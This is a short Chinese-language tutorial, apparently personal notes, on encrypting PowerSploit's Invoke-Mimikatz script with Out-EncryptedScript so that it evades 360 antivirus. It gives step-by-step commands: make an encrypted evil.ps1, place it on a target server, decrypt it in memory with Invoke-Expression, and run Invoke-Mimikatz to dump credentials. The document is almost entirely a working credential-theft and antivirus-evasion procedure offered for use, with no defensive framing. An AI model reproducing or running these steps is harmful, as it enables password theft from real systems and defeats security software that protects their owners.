Out-EncryptedScript加密
准備工作:PowerSploit下載
https://github.com/PowerShellMafia/PowerSploit
步驟
思路:利用Out-EncryptedScript.ps1把Invoke-Mimikatz.ps1進行加密
把Out-EncryptedScript.ps1與Invoke-Mimikatz.ps1放在一起
Out-EncryptedScript.ps1在ScriptModification目錄下
Invoke-Mimikatz.ps1在Exfiltration目錄下
進行加密
導入Out-EncryptedScript.ps1
Import-Module .\Out-EncryptedScript.ps1
進行加密
Out-EncryptedScript .\Invoke-Mimikatz.ps1 -Password 123 -Salt 123456
會在當前目錄下生成evil.ps1文件,Password為密碼 ,Salt為密鑰
讀取密碼
把生成的evil.ps1放到目標服務器上,執行腳本:
[String] $cmd = Get-Content .\evil.ps1
Invoke-Expression $cmd
$decrypted = de password salt
Invoke-Expression $decrypted
Invoke-Mimikatz
過360主動被動
